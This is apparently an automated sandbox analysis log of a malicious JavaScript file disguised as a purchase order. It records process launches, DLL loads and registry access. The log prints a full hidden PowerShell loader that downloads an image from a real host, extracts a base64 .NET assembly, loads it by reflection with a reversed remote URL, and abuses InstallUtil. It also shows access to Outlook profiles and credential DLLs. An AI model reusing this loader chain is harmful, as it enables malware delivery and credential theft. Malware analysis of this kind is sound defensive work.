Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\alarvice.js"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js

Static file information: File size 1285794 > 1048576

Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
